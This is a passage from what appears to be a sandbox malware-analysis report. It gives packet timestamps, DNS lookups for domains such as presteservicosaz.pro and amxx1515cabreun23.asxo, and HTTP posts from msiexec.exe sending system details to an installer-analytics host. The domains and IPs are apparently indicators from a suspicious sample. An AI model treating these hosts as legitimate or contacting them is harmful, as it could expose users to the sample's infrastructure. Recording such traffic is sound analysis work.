                                                May 16, 2024 04:41:03.256026983 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.256040096 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.256145954 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.256165028 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.256175041 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.256185055 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.256200075 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.256345034 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.534017086 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.534039974 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.534148932 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.534148932 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.534159899 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.534183025 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.534202099 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.534212112 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.534219027 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.534233093 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.534284115 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.534367085 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.534396887 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.534446955 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.534446955 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.534451962 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.534476995 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.534615993 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.537925959 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.537940979 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:03.537970066 CEST49704443192.168.2.5194.180.191.24
                                                May 16, 2024 04:41:03.537976027 CEST44349704194.180.191.24192.168.2.5
                                                May 16, 2024 04:41:18.731508970 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:18.863922119 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:18.864006996 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:18.864387035 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:18.864459991 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:18.996710062 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:18.996727943 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.003155947 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.004985094 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.142530918 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.142574072 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.275424004 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.283915997 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.283992052 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.285012007 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.285082102 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.417413950 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.426065922 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.426127911 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.427333117 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.427395105 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.559607983 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.566579103 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.566627979 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.567694902 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.567763090 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.700129986 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.706940889 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.707016945 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.714695930 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.714848042 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.847600937 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.854109049 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.854165077 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.855360985 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.855412960 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.987622023 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.994918108 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:19.994973898 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.996213913 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:19.996234894 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.128545046 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.135318995 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.135397911 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.136507034 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.136526108 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.269511938 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.275909901 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.275963068 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.277035952 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.277092934 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.409307957 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.417790890 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.417855978 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.418941021 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.418991089 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.551750898 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.558240891 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.558305979 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.559390068 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.559441090 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.691685915 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.699634075 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.699695110 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.700751066 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.700793982 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.833060980 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.840188026 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.840260983 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.852502108 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.852575064 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.987124920 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.990972042 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:20.991045952 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.992151022 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:20.992192984 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.124486923 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:21.132839918 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:21.132901907 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.134114981 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.134171009 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.266392946 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:21.273088932 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:21.273212910 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.275059938 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.275084972 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.407347918 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:21.414822102 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:21.416985035 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.432512999 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.432537079 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.564831972 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:21.571908951 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:21.571976900 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.573111057 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.573164940 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.706886053 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:21.713527918 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:21.713579893 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.714663982 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.714710951 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.846889019 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:21.854727983 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:21.854831934 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.855814934 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.855927944 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:21.988154888 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.008183956 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.008234978 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.009416103 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.009471893 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.141690969 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.148236990 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.148293972 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.149282932 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.149390936 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.281667948 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.287923098 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.287972927 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.289278030 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.289345026 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.421576977 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.428570986 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.428639889 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.429749012 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.429776907 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.562031031 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.569343090 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.569418907 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.570494890 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.570604086 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.702817917 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.710050106 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.710095882 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.711122990 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.711189985 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.843436956 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.850832939 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.850902081 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.852271080 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.852333069 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.986383915 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.994971037 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:22.995083094 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.996254921 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:22.996299028 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.128604889 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.135792017 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.135859966 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.137051105 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.137075901 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.269341946 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.275819063 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.275878906 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.276931047 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.276957989 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.409252882 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.416615963 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.416708946 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.418211937 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.418266058 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.550556898 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.557143927 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.557188988 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.558531046 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.558579922 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.690825939 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.698715925 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.698787928 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.699748039 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.699841022 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.832148075 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.838516951 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.838579893 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.844733000 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.844750881 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.977040052 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.984416008 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:23.984469891 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.985655069 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:23.985707998 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.117944002 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:24.124808073 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:24.124911070 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.126142979 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.126190901 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.258459091 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:24.264904976 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:24.264983892 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.266132116 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.266185045 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.400013924 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:24.405625105 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:24.405675888 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.406838894 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.406867981 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.539112091 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:24.545455933 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:24.545506001 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.547045946 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.547096014 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.679459095 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:24.693871021 CEST804971054.227.134.57192.168.2.5
                                                May 16, 2024 04:41:24.694135904 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:24.784603119 CEST4971080192.168.2.554.227.134.57
                                                May 16, 2024 04:41:45.814831972 CEST4971180192.168.2.5194.180.191.36
                                                May 16, 2024 04:41:46.088437080 CEST8049711194.180.191.36192.168.2.5
                                                May 16, 2024 04:41:46.088531017 CEST4971180192.168.2.5194.180.191.36
                                                May 16, 2024 04:41:46.088874102 CEST4971180192.168.2.5194.180.191.36
                                                May 16, 2024 04:41:46.362592936 CEST8049711194.180.191.36192.168.2.5
                                                May 16, 2024 04:41:46.459820986 CEST8049711194.180.191.36192.168.2.5
                                                May 16, 2024 04:41:46.499506950 CEST4971180192.168.2.5194.180.191.36
                                                May 16, 2024 04:41:51.465428114 CEST8049711194.180.191.36192.168.2.5
                                                May 16, 2024 04:41:51.465516090 CEST4971180192.168.2.5194.180.191.36
                                                May 16, 2024 04:41:53.787226915 CEST4971180192.168.2.5194.180.191.36
                                                May 16, 2024 04:41:54.061077118 CEST8049711194.180.191.36192.168.2.5

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 16, 2024 04:40:58.403433084 CEST6457853192.168.2.51.1.1.1
                                                May 16, 2024 04:40:58.517762899 CEST53645781.1.1.1192.168.2.5
                                                May 16, 2024 04:41:18.603069067 CEST6525453192.168.2.51.1.1.1
                                                May 16, 2024 04:41:18.729186058 CEST53652541.1.1.1192.168.2.5
                                                May 16, 2024 04:41:46.476869106 CEST5526753192.168.2.51.1.1.1
                                                May 16, 2024 04:41:46.587449074 CEST53552671.1.1.1192.168.2.5

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                May 16, 2024 04:40:58.403433084 CEST192.168.2.51.1.1.10x4431Standard query (0)presteservicosaz.proA (IP address)IN (0x0001)false
                                                May 16, 2024 04:41:18.603069067 CEST192.168.2.51.1.1.10x2295Standard query (0)collect.installeranalytics.comA (IP address)IN (0x0001)false
                                                May 16, 2024 04:41:46.476869106 CEST192.168.2.51.1.1.10x8db3Standard query (0)amxx1515cabreun23.asxoA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                May 16, 2024 04:40:58.517762899 CEST1.1.1.1192.168.2.50x4431No error (0)presteservicosaz.pro194.180.191.24A (IP address)IN (0x0001)false
                                                May 16, 2024 04:41:12.071003914 CEST1.1.1.1192.168.2.50xf83dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                May 16, 2024 04:41:12.071003914 CEST1.1.1.1192.168.2.50xf83dNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                May 16, 2024 04:41:18.729186058 CEST1.1.1.1192.168.2.50x2295No error (0)collect.installeranalytics.com54.227.134.57A (IP address)IN (0x0001)false
                                                May 16, 2024 04:41:18.729186058 CEST1.1.1.1192.168.2.50x2295No error (0)collect.installeranalytics.com54.221.197.204A (IP address)IN (0x0001)false
                                                May 16, 2024 04:41:46.587449074 CEST1.1.1.1192.168.2.50x8db3Name error (3)amxx1515cabreun23.asxononenoneA (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • presteservicosaz.pro
                                                • collect.installeranalytics.com
                                                • 194.180.191.36

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.54971054.227.134.57805624C:\Windows\SysWOW64\msiexec.exe
                                                TimestampBytes transferredDirectionData
                                                May 16, 2024 04:41:18.864387035 CEST241OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 167
                                                Cache-Control: no-cache
                                                May 16, 2024 04:41:18.864459991 CEST167OUTData Raw: 71 74 3d 36 37 37 39 34 35 33 26 74 3d 6c 69 66 65 63 79 63 6c 65 26 6c 63 3d 73 74 61 72 74 26 76 3d 33 26 61 69 64 3d 36 36 34 35 30 31 65 64 32 30 61 35 39 61 64 65 34 63 32 33 38 64 35 37 26 61 76 3d 36 2e 35 2e 37 2e 34 26 63 69 64 3d 36 34
                                                Data Ascii: qt=6779453&t=lifecycle&lc=start&v=3&aid=664501ed20a59ade4c238d57&av=6.5.7.4&cid=643723AC551666E9AF596F6B2A6F6BAD7DC8601F&sid=%7B15EDF404-6639-418F-86D1-C094DA28F881%7D
                                                May 16, 2024 04:41:19.003155947 CEST338INHTTP/1.1 200 OK
                                                Cache-control: no-cache="set-cookie"
                                                Date: Thu, 16 May 2024 02:41:18 GMT
                                                Set-Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366;PATH=/;MAX-AGE=600
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:19.142530918 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 179
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:19.142574072 CEST179OUTData Raw: 71 74 3d 36 37 38 30 30 31 35 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 56 65 72 73 69 6f 6e 4e 54 26 76 61 6c 3d 31 30 30 30 26 76 3d 33 26 61 69 64 3d 36 36 34 35 30 31 65 64 32 30 61 35 39 61 64 65 34 63 32 33 38 64 35 37 26 61 76 3d 36 2e
                                                Data Ascii: qt=6780015&t=property&lb=VersionNT&val=1000&v=3&aid=664501ed20a59ade4c238d57&av=6.5.7.4&cid=643723AC551666E9AF596F6B2A6F6BAD7DC8601F&sid=%7B15EDF404-6639-418F-86D1-C094DA28F881%7D
                                                May 16, 2024 04:41:19.283915997 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:19 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:19.285012007 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 181
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:19.285082102 CEST181OUTData Raw: 71 74 3d 36 37 38 30 31 35 36 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 56 65 72 73 69 6f 6e 4e 54 36 34 26 76 61 6c 3d 31 30 30 30 26 76 3d 33 26 61 69 64 3d 36 36 34 35 30 31 65 64 32 30 61 35 39 61 64 65 34 63 32 33 38 64 35 37 26 61 76 3d
                                                Data Ascii: qt=6780156&t=property&lb=VersionNT64&val=1000&v=3&aid=664501ed20a59ade4c238d57&av=6.5.7.4&cid=643723AC551666E9AF596F6B2A6F6BAD7DC8601F&sid=%7B15EDF404-6639-418F-86D1-C094DA28F881%7D
                                                May 16, 2024 04:41:19.426065922 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:19 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:19.427333117 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 184
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:19.427395105 CEST184OUTData Raw: 71 74 3d 36 37 38 30 32 39 36 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 50 68 79 73 69 63 61 6c 4d 65 6d 6f 72 79 26 76 61 6c 3d 38 31 39 31 26 76 3d 33 26 61 69 64 3d 36 36 34 35 30 31 65 64 32 30 61 35 39 61 64 65 34 63 32 33 38 64 35 37 26
                                                Data Ascii: qt=6780296&t=property&lb=PhysicalMemory&val=8191&v=3&aid=664501ed20a59ade4c238d57&av=6.5.7.4&cid=643723AC551666E9AF596F6B2A6F6BAD7DC8601F&sid=%7B15EDF404-6639-418F-86D1-C094DA28F881%7D
                                                May 16, 2024 04:41:19.566579103 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:19 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:19.567694902 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 180
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:19.567763090 CEST180OUTData Raw: 71 74 3d 36 37 38 30 34 33 37 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 56 65 72 73 69 6f 6e 4d 73 69 26 76 61 6c 3d 35 2e 30 30 26 76 3d 33 26 61 69 64 3d 36 36 34 35 30 31 65 64 32 30 61 35 39 61 64 65 34 63 32 33 38 64 35 37 26 61 76 3d 36
                                                Data Ascii: qt=6780437&t=property&lb=VersionMsi&val=5.00&v=3&aid=664501ed20a59ade4c238d57&av=6.5.7.4&cid=643723AC551666E9AF596F6B2A6F6BAD7DC8601F&sid=%7B15EDF404-6639-418F-86D1-C094DA28F881%7D
                                                May 16, 2024 04:41:19.706940889 CEST122INHTTP/1.1 200 OK
